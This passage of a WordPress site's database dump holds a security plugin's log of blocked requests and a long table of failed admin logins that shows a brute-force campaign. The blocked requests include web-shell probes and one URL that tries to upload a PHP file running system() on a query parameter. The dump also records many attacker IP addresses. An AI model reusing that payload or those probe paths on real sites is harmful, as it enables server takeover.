Mozilla\"}','QM5apPUb2W76VeGywqdRAF3K',0,1675192777.2521,140,'','GET',403,0,700,0,1,'',0),('158.69.23.79',2655328079,'','https://equalitywalk.org.uk/wp-admin/wp-admin.php?wall=IHsKICAgIGVjaG8gJ2FEcml2NCc7CiAgICBleGl0OwogIH0','','{\"1\":\"Linux Mozilla\"}','0lAg3yocO9STPUkVC6GuI1h2',0,1675192778.8380,154,'','GET',403,0,700,0,1,'',0),('67.205.150.91',1137546843,'','https://equalitywalk.org.uk/wp-includes/pomo/update.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-includes\\/pomo\\/update.php\"}','Qkua3TmGlWdSXvJRMF2y5HEA',0,1675199047.6910,147,'','GET',403,0,700,0,1,'',0),('47.110.160.63',795779135,'','https://equalitywalk.org.uk/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-content.php\"}','HtkcMrIWaPD1uozE3ixwGCpA',0,1675200836.4666,139,'','GET',403,0,700,0,1,'',0),('47.110.160.63',795779135,'','https://equalitywalk.org.uk/wp-content.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/wp-content.php\"}','JQxZtYf5qUG7kE4wWnCiIR06',0,1675200843.7722,104,'','GET',403,0,700,0,1,'',0),('195.54.174.8',3275140616,'','https://www.equalitywalk.org.uk/wp-admin/css/lj4utm.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko\\/20100101 Firefox\\/109.0\"}','2H8MNA5Q9FCyP1wLulGcJsOU',0,1675201968.4293,123,'','GET',403,0,700,0,1,'',0),('195.54.174.8',3275140616,'','https://www.equalitywalk.org.uk/wp-admin/css/colors/ectoplasm/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko\\/20100101 Firefox\\/109.0\"}','m3vG2UlZ1atg0fYPWnDAJeOB',0,1675201971.5867,148,'','GET',403,0,700,0,1,'',0),('195.54.174.8',3275140616,'','https://www.equalitywalk.org.uk/wp-includes/Text/Diff/Engine/temp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko\\/20100101 Firefox\\/109.0\"}','V2LJoG9nzM7w6TOrWUgfkdA8',0,1675201973.7366,121,'','GET',403,0,700,0,1,'',0),('4.233.147.230',82416614,'','https://www.equalitywalk.org.uk/wp-22.php?sfilename=1975.php&sfilecontent=%3C?=echo%20system($_GET%5B%22ll%22%5D;%20);&supfiles=1975.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','i0nKTj9rtXAIWVxOR3fGuDdy',0,1675205824.4965,169,'','GET',403,0,700,0,1,'',0),('67.227.199.102',1139001190,'','https://equalitywalk.org.uk/.well-known/atomlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit\\/533.4 (KHTML, like Gecko) Chrome\\/5.0.375.99 Safari\\/533.4\",\"2\":\"http:\\/\\/equalitywalk.org.uk\\/.well-known\\/atomlib.php\"}','SsA70EnLzmceQJpjPKqTfyRX',0,1675209303.7137,1507,'','GET',403,0,700,0,1,'',0),('194.38.20.161',3257275553,'','https://equalitywalk.org.uk/sites/all/libraries/plupload/examples/upload.php','','{\"1\":\"ALittle Client\"}','E5BQKHYXrpSkCjxi1MqTyUW0',0,1675209340.9316,1320,'','GET',403,0,700,0,1,'',0);
/*!40000 ALTER TABLE `cerber_traffic` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_events`
--

DROP TABLE IF EXISTS `wp_aiowps_events`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_events` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `event_type` varchar(150) NOT NULL DEFAULT '',
  `username` varchar(150) DEFAULT NULL,
  `user_id` bigint(20) DEFAULT NULL,
  `event_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `ip_or_host` varchar(100) DEFAULT NULL,
  `referer_info` varchar(255) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `country_code` varchar(50) DEFAULT NULL,
  `event_data` longtext DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_events`
--

LOCK TABLES `wp_aiowps_events` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_events` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_aiowps_events` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_aiowps_failed_logins`
--

DROP TABLE IF EXISTS `wp_aiowps_failed_logins`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_aiowps_failed_logins` (
  `id` bigint(20) NOT NULL AUTO_INCREMENT,
  `user_id` bigint(20) NOT NULL,
  `user_login` varchar(150) NOT NULL,
  `failed_login_date` datetime NOT NULL DEFAULT '1000-10-10 10:00:00',
  `login_attempt_ip` varchar(100) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=8588 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_aiowps_failed_logins`
--

LOCK TABLES `wp_aiowps_failed_logins` WRITE;
/*!40000 ALTER TABLE `wp_aiowps_failed_logins` DISABLE KEYS */;
INSERT INTO `wp_aiowps_failed_logins` VALUES (3588,1,'admin','2021-08-24 19:05:31','178.62.33.222'),(3589,1,'admin','2021-08-24 19:10:09','186.64.117.145'),(3590,1,'admin','2021-08-24 19:15:02','103.86.176.93'),(3591,1,'admin','2021-08-24 19:15:03','103.86.176.93'),(3592,1,'admin','2021-08-24 19:19:16','46.101.99.15'),(3593,1,'admin','2021-08-24 19:24:35','78.157.40.153'),(3594,1,'admin','2021-08-24 19:28:58','173.236.184.113'),(3595,1,'admin','2021-08-24 19:38:08','67.23.254.254'),(3596,1,'admin','2021-08-24 19:38:08','67.23.254.254'),(3597,1,'admin','2021-08-24 19:42:42','103.142.25.112'),(3598,1,'admin','2021-08-24 19:47:28','198.11.177.173'),(3599,1,'admin','2021-08-24 19:52:00','162.0.208.15'),(3600,1,'admin','2021-08-24 19:56:56','162.214.231.52'),(3601,1,'admin','2021-08-24 20:01:56','167.86.75.216'),(3602,1,'admin','2021-08-24 20:06:26','34.125.54.204'),(3603,1,'admin','2021-08-24 20:07:03','185.220.100.255'),(3604,1,'admin','2021-08-24 20:11:43','207.244.251.142'),(3605,1,'admin','2021-08-24 20:21:22','103.124.93.236'),(3606,1,'admin','2021-08-24 20:26:55','37.187.91.7'),(3607,1,'admin','2021-08-24 20:36:58','185.183.122.143'),(3608,1,'admin','2021-08-24 20:41:50','160.16.141.232'),(3609,1,'admin','2021-08-24 20:47:02','117.6.44.214'),(3610,1,'admin','2021-08-24 20:52:09','162.214.163.37'),(3611,1,'admin','2021-08-24 20:57:19','176.53.84.179'),(3612,1,'admin','2021-08-24 21:02:40','51.144.101.50'),(3613,1,'admin','2021-08-24 21:07:31','186.64.119.15'),(3614,1,'admin','2021-08-24 21:13:20','147.139.136.124'),(3615,1,'admin','2021-08-24 21:18:28','178.238.231.203'),(3616,1,'admin','2021-08-24 21:24:01','64.227.58.145'),(3617,1,'admin','2021-08-24 21:28:58','186.64.117.95'),(3618,1,'admin','2021-08-24 21:40:00','51.144.101.50'),(3619,1,'admin','2021-08-24 21:50:18','103.124.95.89'),(3620,1,'admin','2021-08-24 21:55:54','165.22.147.65'),(3621,1,'admin','2021-08-24 22:12:52','178.128.193.134'),(3622,1,'admin','2021-08-24 22:24:19','138.197.131.66'),(3623,1,'admin','2021-08-24 22:58:49','178.238.231.203'),(3624,1,'admin','2021-08-24 23:04:19','67.205.152.127'),(3625,1,'admin','2021-08-24 23:16:35','185.20.51.238'),(3626,1,'admin','2021-08-24 23:22:08','67.205.152.127'),(3627,1,'admin','2021-08-24 23:27:39','125.206.171.197'),(3628,1,'admin','2021-08-24 23:39:38','103.146.221.82'),(3629,1,'admin','2021-08-24 23:45:49','45.158.12.222'),(3630,1,'admin','2021-08-24 23:57:40','162.0.208.15'),(3631,1,'admin','2021-08-25 00:15:30','157.245.107.81'),(3632,1,'admin','2021-08-25 00:22:02','78.157.36.98'),(3633,1,'admin','2021-08-25 00:46:33','64.90.48.195'),(3634,1,'admin','2021-08-25 01:11:01','162.214.79.150'),(3635,1,'admin','2021-08-25 01:11:01','162.214.79.150'),(3636,1,'admin','2021-08-25 01:30:35','159.203.176.82'),(3637,1,'admin','2021-08-25 01:49:51','106.14.41.203'),(3638,1,'admin','2021-08-25 01:56:29','107.181.185.226'),(3639,1,'admin','2021-08-25 02:09:43','164.68.99.251'),(3640,1,'admin','2021-08-25 02:16:09','125.212.241.179'),(3641,1,'admin','2021-08-25 02:55:53','62.210.209.245'),(3642,1,'admin','2021-08-25 03:10:36','185.49.84.38'),(3643,1,'admin','2021-08-25 03:16:05','192.185.130.172'),(3644,1,'admin','2021-08-25 03:22:50','164.68.116.12'),(3645,1,'admin','2021-08-25 03:29:41','66.23.252.226'),(3646,1,'admin','2021-08-25 03:36:20','94.20.43.46'),(3647,1,'admin','2021-08-25 03:49:45','52.163.127.23'),(3648,1,'admin','2021-08-25 03:56:08','8.210.53.246'),(3649,1,'admin','2021-08-25 04:10:04','162.241.200.25'),(3650,1,'admin','2021-08-25 04:30:32','50.116.98.31'),(3651,1,'admin','2021-08-25 04:38:00','125.206.171.197'),(3652,1,'admin','2021-08-25 04:45:22','144.91.104.163'),(3653,1,'admin','2021-08-25 05:01:20','186.234.80.90'),(3654,1,'admin','2021-08-25 05:06:07','45.119.213.225'),(3655,1,'admin','2021-08-25 05:09:36','186.234.80.173'),(3656,1,'admin','2021-08-25 05:13:23','92.204.249.181'),(3657,1,'admin','2021-08-25 05:17:10','176.31.134.145'),(3658,1,'admin','2021-08-25 05:20:30','162.241.174.216'),(3659,1,'admin','2021-08-25 05:24:20','162.241.127.73'),(3660,1,'admin','2021-08-25 05:27:45','85.128.142.146'),(3661,1,'admin','2021-08-25 05:31:19','69.163.224.120'),(3662,1,'admin','2021-08-25 05:56:33','27.50.77.95'),(3663,1,'admin','2021-08-25 05:59:44','159.65.225.6'),(3664,1,'admin','2021-08-25 06:03:04','142.93.250.165'),(3665,1,'admin','2021-08-25 06:06:49','125.206.171.197'),(3666,1,'admin','2021-08-25 06:10:00','125.212.192.57'),(3667,1,'admin','2021-08-25 06:13:31','34.94.247.253'),(3668,1,'admin','2021-08-25 06:16:55','184.171.244.231'),(3669,1,'admin','2021-08-25 06:20:10','162.241.102.138'),(3670,1,'admin','2021-08-25 06:23:27','103.211.219.226'),(3671,1,'admin','2021-08-25 06:26:37','3.13.254.62'),(3672,1,'admin','2021-08-25 06:30:26','176.235.216.155'),(3673,1,'admin','2021-08-25 06:33:45','103.107.183.115'),(3674,1,'admin','2021-08-25 06:37:15','157.230.164.216'),(3675,1,'admin','2021-08-25 06:40:29','148.66.130.114'),(3676,1,'admin','2021-08-25 06:44:05','23.99.97.154'),(3677,1,'admin','2021-08-25 06:47:08','138.68.235.36'),(3678,1,'admin','2021-08-25 06:50:50','152.32.150.65'),(3679,1,'admin','2021-08-25 06:53:56','185.68.19.215'),(3680,1,'admin','2021-08-25 06:57:33','64.111.109.226'),(3681,1,'admin','2021-08-25 07:00:52','5.189.153.231'),(3682,1,'admin','2021-08-25 07:04:05','148.251.83.21'),(3683,1,'admin','2021-08-25 07:07:19','186.64.114.15'),(3684,1,'admin','2021-08-25 07:10:46','185.233.152.82'),(3685,1,'admin','2021-08-25 07:14:14','198.11.177.173'),(3686,1,'admin','2021-08-25 07:17:31','104.168.157.134'),(3687,1,'admin','2021-08-25 07:21:00','103.138.116.50'),(3688,1,'admin','2021-08-25 07:24:46','141.85.216.231'),(3689,1,'admin','2021-08-25 07:28:13','81.88.52.134'),(3690,1,'admin','2021-08-25 07:31:53','107.161.177.10'),(3691,1,'admin','2021-08-25 07:35:36','208.97.177.228'),(3692,1,'admin','2021-08-25 07:39:18','162.214.163.37'),(3693,1,'admin','2021-08-25 07:42:57','66.29.143.127'),(3694,1,'admin','2021-08-25 07:46:33','178.128.166.56'),(3695,1,'admin','2021-08-25 07:50:44','107.180.105.195'),(3696,1,'admin','2021-08-25 07:54:52','74.208.103.228'),(3697,1,'admin','2021-08-25 07:58:25','8.210.53.246'),(3698,1,'admin','2021-08-25 08:02:24','103.90.232.106'),(3699,1,'admin','2021-08-25 08:06:53','207.244.251.142'),(3700,1,'admin','2021-08-25 08:10:55','54.39.105.88'),(3701,1,'admin','2021-08-25 08:14:55','167.86.75.216'),(3702,1,'admin','2021-08-25 08:18:34','5.63.10.206'),(3703,1,'admin','2021-08-25 08:22:56','162.214.54.112'),(3704,1,'admin','2021-08-25 08:26:44','203.171.21.225'),(3705,1,'admin','2021-08-25 08:31:04','157.175.132.92'),(3706,1,'admin','2021-08-25 08:35:33','91.192.164.15'),(3707,1,'admin','2021-08-25 08:39:10','159.65.65.170'),(3708,1,'admin','2021-08-25 08:43:20','186.64.119.95'),(3709,1,'admin','2021-08-25 08:47:54','13.76.132.231'),(3710,1,'admin','2021-08-25 08:52:10','159.203.176.82'),(3711,1,'admin','2021-08-25 08:56:32','192.163.198.248'),(3712,1,'admin','2021-08-25 09:00:48','167.172.151.91'),(3713,1,'admin','2021-08-25 09:04:56','186.64.119.214'),(3714,1,'admin','2021-08-25 09:09:32','162.214.163.37'),(3715,1,'admin','2021-08-25 09:13:45','107.190.131.50'),(3716,1,'admin','2021-08-25 09:18:15','162.214.229.147'),(3717,1,'admin','2021-08-25 09:22:36','66.29.139.124'),(3718,1,'admin','2021-08-25 09:24:12','194.28.84.172'),(3719,1,'admin','2021-08-25 09:27:05','94.20.43.46'),(3720,1,'admin','2021-08-25 09:31:34','64.90.48.181'),(3721,1,'admin','2021-08-25 09:35:33','159.65.219.142'),(3722,1,'admin','2021-08-25 09:40:19','164.68.116.12'),(3723,1,'admin','2021-08-25 09:44:33','43.242.128.31'),(3724,1,'admin','2021-08-25 09:56:48','177.10.165.117'),(3725,1,'admin','2021-08-25 10:01:36','165.22.255.242'),(3726,1,'admin','2021-08-25 10:06:04','148.72.211.177'),(3727,1,'admin','2021-08-25 10:10:53','107.161.177.10'),(3728,1,'admin','2021-08-25 10:15:37','144.91.76.61'),(3729,1,'admin','2021-08-25 10:20:18','209.126.5.104'),(3730,1,'admin','2021-08-25 10:25:13','45.93.168.195'),(3731,1,'admin','2021-08-25 10:29:56','208.109.8.126'),(3732,1,'admin','2021-08-25 10:34:38','162.214.229.147'),(3733,1,'admin','2021-08-25 10:39:36','176.53.84.179'),(3734,1,'admin','2021-08-25 10:44:18','177.10.165.117'),(3735,1,'admin','2021-08-25 10:49:01','165.232.130.240'),(3736,1,'admin','2021-08-25 10:54:16','144.217.255.56'),(3737,1,'admin','2021-08-25 10:59:10','88.99.136.47'),(3738,1,'admin','2021-08-25 11:03:44','150.95.110.113'),(3739,1,'admin','2021-08-25 11:08:45','64.227.58.145'),(3740,1,'admin','2021-08-25 11:13:30','216.137.176.183'),(3741,1,'admin','2021-08-25 11:18:29','5.101.157.43'),(3742,1,'admin','2021-08-25 11:22:05','107.181.185.226'),(3743,1,'admin','2021-08-25 11:27:05','80.172.253.26'),(3744,1,'admin','2021-08-25 11:32:03','66.23.252.226'),(3745,1,'admin','2021-08-25 11:36:40','143.198.30.100'),(3746,1,'admin','2021-08-25 11:41:54','162.241.174.216'),(3747,1,'admin','2021-08-25 11:47:06','173.209.57.149'),(3748,1,'admin','2021-08-25 11:51:58','162.241.149.137'),(3749,1,'admin','2021-08-25 11:57:11','5.101.157.43'),(3750,1,'admin','2021-08-25 12:02:12','144.217.255.56'),(3751,1,'admin','2021-08-25 12:07:21','69.49.229.201'),(3752,1,'admin','2021-08-25 12:12:39','176.53.84.179'),(3753,1,'admin','2021-08-25 12:17:26','186.64.117.75'),(3754,1,'admin','2021-08-25 12:22:42','165.232.130.240'),(3755,1,'admin','2021-08-25 12:28:37','190.224.163.182'),(3756,1,'admin','2021-08-25 12:33:47','87.98.252.203'),(3757,1,'admin','2021-08-25 12:38:58','138.197.131.66'),(3758,1,'admin','2021-08-25 12:44:06','162.241.149.137'),(3759,1,'admin','2021-08-25 12:49:31','185.46.120.131'),(3760,1,'admin','2021-08-25 12:54:19','186.64.114.30'),(3761,1,'admin','2021-08-25 12:59:38','1.116.18.228'),(3762,1,'admin','2021-08-25 13:05:30','123.231.204.2'),(3763,1,'admin','2021-08-25 13:11:04','64.111.109.226'),(3764,1,'admin','2021-08-25 13:21:49','176.235.216.155'),(3765,1,'admin','2021-08-25 13:27:08','72.167.42.45'),(3766,1,'admin','2021-08-25 13:30:37','20.199.49.20'),(3767,1,'admin','2021-08-25 13:30:38','20.199.49.20'),(3768,1,'admin','2021-08-25 13:30:40','20.199.49.20'),(3769,1,'admin','2021-08-25 13:32:28','167.86.75.216'),(3770,1,'admin','2021-08-25 13:37:32','186.64.114.25'),(3771,1,'admin','2021-08-25 13:43:18','167.86.66.101'),(3772,1,'admin','2021-08-25 13:48:37','107.181.185.226'),(3773,1,'admin','2021-08-25 13:54:03','107.190.131.50'),(3774,1,'admin','2021-08-25 13:59:30','216.137.176.183'),(3775,1,'admin','2021-08-25 14:04:58','208.109.8.126'),(3776,1,'admin','2021-08-25 14:16:00','84.16.227.247'),(3777,1,'admin','2021-08-25 14:21:32','184.171.244.231'),(3778,1,'admin','2021-08-25 14:27:02','95.128.43.176'),(3779,1,'admin','2021-08-25 14:37:38','128.199.249.213'),(3780,1,'admin','2021-08-25 14:43:13','148.66.129.250'),(3781,1,'admin','2021-08-25 15:04:12','185.2.4.33'),(3782,1,'admin','2021-08-25 15:17:06','67.205.157.14'),(3783,1,'admin','2021-08-25 15:29:42','139.59.154.27'),(3784,1,'admin','2021-08-25 15:42:29','210.13.75.122'),(3785,1,'admin','2021-08-25 15:54:58','173.236.168.109'),(3786,1,'admin','2021-08-25 16:07:31','34.68.76.32'),(3787,1,'admin','2021-08-25 16:19:54','35.205.44.38'),(3788,1,'admin','2021-08-25 16:45:01','93.113.111.54'),(3789,1,'admin','2021-08-25 16:57:35','54.39.105.88'),(3790,1,'admin','2021-08-25 17:22:45','188.40.37.189'),(3791,1,'admin','2021-08-25 17:35:27','101.32.178.221'),(3792,1,'admin','2021-08-25 17:48:05','194.247.179.164'),(3793,1,'admin','2021-08-25 18:00:45','20.62.193.224'),(3794,1,'admin','2021-08-25 18:13:31','159.89.234.226'),(3795,1,'admin','2021-08-25 18:26:09','81.88.52.172'),(3796,1,'admin','2021-08-25 18:38:46','162.55.53.198'),(3797,1,'admin','2021-08-25 18:51:29','45.40.166.143'),(3798,1,'admin','2021-08-25 19:04:10','185.2.4.71'),(3799,1,'admin','2021-08-25 19:29:39','93.113.111.54'),(3800,1,'admin','2021-08-25 19:41:09','51.210.137.18'),(3801,1,'admin','2021-08-25 19:41:14','51.210.137.18'),(3802,1,'admin','2021-08-25 19:41:24','51.210.137.18'),(3803,1,'admin','2021-08-25 19:42:29','118.69.173.199'),(3804,1,'admin','2021-08-25 20:08:01','159.89.224.103'),(3805,1,'admin','2021-08-25 20:20:44','45.40.166.141'),(3806,1,'admin','2021-08-25 20:33:26','95.217.3.203'),(3807,1,'admin','2021-08-25 20:46:12','159.65.216.18'),(3808,1,'admin','2021-08-25 20:59:03','207.154.231.132'),(3809,1,'admin','2021-08-25 21:11:52','159.65.76.38'),(3810,1,'admin','2021-08-25 21:24:44','207.180.203.19'),(3811,1,'admin','2021-08-25 21:37:33','82.64.135.27'),(3812,1,'admin','2021-08-25 21:47:28','20.51.209.157'),(3813,1,'admin','2021-08-25 21:47:31','20.51.209.157'),(3814,1,'admin','2021-08-25 21:47:34','20.51.209.157'),(3815,1,'admin','2021-08-25 21:50:27','103.90.232.219'),(3816,1,'admin','2021-08-25 22:03:25','209.97.169.15'),(3817,1,'admin','2021-08-25 22:29:13','96.125.171.153'),(3818,1,'admin','2021-08-25 22:42:11','34.80.144.82'),(3819,0,'paulmarr','2021-08-25 22:44:22','62.210.82.116'),(3820,0,'paulmarr','2021-08-25 22:44:23','62.210.82.116'),(3821,0,'paulmarr','2021-08-25 22:44:23','62.210.82.116'),(3822,1,'admin','2021-08-25 22:55:08','173.236.176.10'),(3823,1,'admin','2021-08-25 23:08:10','159.65.216.18'),(3824,1,'admin','2021-08-25 23:21:09','134.209.196.64'),(3825,1,'admin','2021-08-25 23:34:09','35.205.44.38'),(3826,1,'admin','2021-08-25 23:47:13','101.32.178.221'),(3827,1,'admin','2021-08-26 00:00:13','217.70.186.133'),(3828,1,'admin','2021-08-26 00:13:20','188.166.32.16'),(3829,1,'admin','2021-08-26 00:26:32','206.189.140.3'),(3830,1,'admin','2021-08-26 00:52:53','173.236.176.10'),(3831,1,'admin','2021-08-26 01:06:10','178.128.59.73'),(3832,1,'admin','2021-08-26 01:19:22','178.151.64.197'),(3833,1,'admin','2021-08-26 01:23:24','52.170.58.109'),(3834,1,'admin','2021-08-26 01:23:26','52.170.58.109'),(3835,1,'admin','2021-08-26 01:23:29','52.170.58.109'),(3836,1,'admin','2021-08-26 01:32:36','143.198.229.94'),(3837,1,'admin','2021-08-26 01:45:52','193.19.240.121'),(3838,1,'admin','2021-08-26 01:59:11','70.36.15.82'),(3839,1,'admin','2021-08-26 02:12:32','45.207.65.42'),(3840,1,'admin','2021-08-26 02:39:16','82.64.135.27'),(3841,1,'admin','2021-08-26 02:52:39','195.93.152.83'),(3842,1,'admin','2021-08-26 03:06:52','165.22.213.0'),(3843,1,'admin','2021-08-26 03:32:39','161.97.68.199'),(3844,1,'admin','2021-08-26 08:05:27','210.57.216.56'),(3845,1,'admin','2021-08-26 08:18:31','167.172.175.147'),(3846,1,'admin','2021-08-26 08:31:43','62.28.182.218'),(3847,1,'admin','2021-08-26 08:44:52','192.145.47.204'),(3848,1,'admin','2021-08-26 09:11:18','177.55.111.13'),(3849,1,'admin','2021-08-26 09:24:30','159.65.216.18'),(3850,1,'admin','2021-08-26 09:37:45','148.66.129.233'),(3851,1,'admin','2021-08-26 09:51:04','206.189.140.3'),(3852,1,'admin','2021-08-26 10:04:25','196.41.122.224'),(3853,1,'admin','2021-08-26 10:17:49','67.205.12.218'),(3854,1,'admin','2021-08-26 10:31:10','139.59.25.246'),(3855,1,'admin','2021-08-26 10:44:26','51.75.200.183'),(3856,1,'admin','2021-08-26 10:57:42','188.166.94.198'),(3857,1,'admin','2021-08-26 11:11:04','166.62.125.246'),(3858,1,'admin','2021-08-26 11:24:31','177.55.111.13'),(3859,1,'admin','2021-08-26 11:38:06','103.153.2.5'),(3860,1,'admin','2021-08-26 11:51:40','176.119.210.163'),(3861,1,'admin','2021-08-26 12:05:19','157.245.110.251'),(3862,1,'admin','2021-08-26 12:18:57','207.244.233.113'),(3863,1,'admin','2021-08-26 12:32:27','116.203.150.71'),(3864,1,'admin','2021-08-26 12:46:08','128.199.245.21'),(3865,1,'admin','2021-08-26 12:59:48','95.216.208.32'),(3866,1,'admin','2021-08-26 13:13:30','187.51.127.28'),(3867,0,'equalitywalk','2021-08-26 13:18:21','107.189.10.143'),(3868,1,'admin','2021-08-26 13:27:24','188.40.37.189'),(3869,1,'admin','2021-08-26 13:41:01','64.111.126.32'),(3870,1,'admin','2021-08-26 13:54:42','104.248.241.209'),(3871,1,'admin','2021-08-26 17:22:54','51.143.1.231'),(3872,1,'admin','2021-08-26 17:22:59','51.143.1.231'),(3873,1,'admin','2021-08-26 17:23:04','51.143.1.231'),(3874,1,'admin','2021-08-26 19:50:18','95.181.152.71'),(3875,1,'admin','2021-08-26 19:50:22','95.181.152.71'),(3876,1,'admin','2021-08-26 19:50:26','95.181.152.71'),(3877,1,'admin','2021-08-26 21:39:48','213.171.214.149'),(3878,1,'admin','2021-08-27 01:53:58','188.166.249.97'),(3879,1,'admin','2021-08-27 01:53:58','188.166.249.97'),(3880,1,'admin','2021-08-27 01:53:59','188.166.249.97'),(3881,1,'admin','2021-08-27 04:10:53','78.134.40.82'),(3882,1,'admin','2021-08-27 06:28:08','13.76.132.231'),(3883,1,'admin','2021-08-27 06:39:54','51.144.101.50'),(3884,0,'equalitywalk','2021-08-27 06:52:01','208.113.163.214'),(3885,0,'equalitywalk','2021-08-27 07:04:26','157.245.107.81'),(3886,0,'equalitywalk','2021-08-27 07:31:13','167.71.206.107'),(3887,0,'equalitywalk','2021-08-27 07:45:52','104.236.120.31'),(3888,0,'equalitywalk','2021-08-27 08:16:33','147.139.136.124'),(3889,0,'equalitywalk','2021-08-27 08:31:55','66.23.252.226'),(3890,0,'equalitywalk','2021-08-27 08:46:48','159.65.184.79'),(3891,0,'equalitywalk','2021-08-27 09:03:08','64.111.126.81'),(3892,0,'equalitywalk','2021-08-27 09:18:51','45.64.54.158'),(3893,0,'equalitywalk','2021-08-27 09:35:45','162.214.79.150'),(3894,0,'equalitywalk','2021-08-27 09:53:22','103.138.116.50'),(3895,0,'equalitywalk','2021-08-27 10:10:48','104.37.175.156'),(3896,0,'equalitywalk','2021-08-27 10:28:54','124.158.12.202'),(3897,0,'equalitywalk','2021-08-27 10:45:55','187.51.127.28'),(3898,1,'admin','2021-08-27 10:57:28','15.206.233.12'),(3899,0,'equalitywalk','2021-08-27 11:03:22','47.244.166.23'),(3900,0,'equalitywalk','2021-08-27 11:20:34','197.13.10.11'),(3901,0,'equalitywalk','2021-08-27 11:38:25','94.20.43.46'),(3902,0,'equalitywalk','2021-08-27 11:56:13','51.144.101.50'),(3903,1,'admin','2021-08-27 11:59:02','193.239.232.102'),(3904,0,'equalitywalk','2021-08-27 12:14:48','144.217.123.236'),(3905,0,'equalitywalk','2021-08-27 12:33:07','160.16.141.232'),(3906,0,'equalitywalk','2021-08-27 12:51:20','144.217.123.236'),(3907,0,'equalitywalk','2021-08-27 13:28:35','104.37.175.156'),(3908,0,'equalitywalk','2021-08-27 13:47:20','103.122.106.234'),(3909,0,'equalitywalk','2021-08-27 14:06:08','152.136.20.21'),(3910,0,'equalitywalk','2021-08-27 14:25:21','129.211.173.215'),(3911,0,'equalitywalk','2021-08-27 14:45:16','107.180.88.41'),(3912,0,'equalitywalk','2021-08-27 15:05:19','213.217.34.100'),(3913,0,'equalitywalk','2021-08-27 15:24:21','5.189.153.231'),(3914,0,'equalitywalk','2021-08-27 15:38:26','20.62.193.224'),(3915,0,'equalitywalk','2021-08-27 15:43:36','104.131.167.46'),(3916,0,'equalitywalk','2021-08-27 16:03:30','162.214.231.52'),(3917,0,'equalitywalk','2021-08-27 16:05:04','142.54.188.74'),(3918,0,'equalitywalk','2021-08-27 16:05:14','206.189.139.182'),(3919,0,'equalitywalk','2021-08-27 16:23:26','93.114.234.242'),(3920,0,'equalitywalk','2021-08-27 16:23:43','173.208.244.90'),(3921,0,'equalitywalk','2021-08-27 16:33:06','185.49.20.78'),(3922,0,'equalitywalk','2021-08-27 16:43:16','162.214.193.48'),(3923,0,'equalitywalk','2021-08-27 17:00:03','81.88.52.154'),(3924,0,'equalitywalk','2021-08-27 17:03:18','66.29.143.127'),(3925,1,'admin','2021-08-27 17:14:35','207.154.243.92'),(3926,0,'equalitywalk','2021-08-27 17:23:24','103.226.250.28'),(3927,0,'equalitywalk','2021-08-27 17:23:43','58.177.156.94'),(3928,0,'equalitywalk','2021-08-27 17:43:24','162.241.149.137'),(3929,0,'equalitywalk','2021-08-27 18:03:29','173.236.169.240'),(3930,0,'equalitywalk','2021-08-27 18:10:25','185.104.249.174'),(3931,0,'equalitywalk','2021-08-27 18:23:11','198.27.82.45'),(3932,0,'equalitywalk','2021-08-27 18:34:33','193.19.240.121'),(3933,0,'equalitywalk','2021-08-27 18:42:59','47.114.4.136'),(3934,0,'equalitywalk','2021-08-27 19:00:14','163.172.22.108'),(3935,0,'equalitywalk','2021-08-27 19:02:21','193.112.212.10'),(3936,0,'equalitywalk','2021-08-27 19:22:24','59.110.143.12'),(3937,0,'equalitywalk','2021-08-27 19:25:54','143.198.229.94'),(3938,0,'equalitywalk','2021-08-27 19:42:41','103.130.213.29'),(3939,0,'equalitywalk','2021-08-27 19:49:51','167.99.114.53'),(3940,0,'equalitywalk','2021-08-27 20:04:18','35.221.233.106'),(3941,0,'equalitywalk','2021-08-27 20:13:16','95.216.221.91'),(3942,0,'equalitywalk','2021-08-27 20:25:42','173.236.169.240'),(3943,0,'equalitywalk','2021-08-27 20:36:52','69.163.163.120'),(3944,0,'equalitywalk','2021-08-27 20:46:42','8.131.70.186'),(3945,0,'equalitywalk','2021-08-27 21:00:54','104.248.233.244'),(3946,0,'equalitywalk','2021-08-27 21:07:41','5.189.153.231'),(3947,0,'equalitywalk','2021-08-27 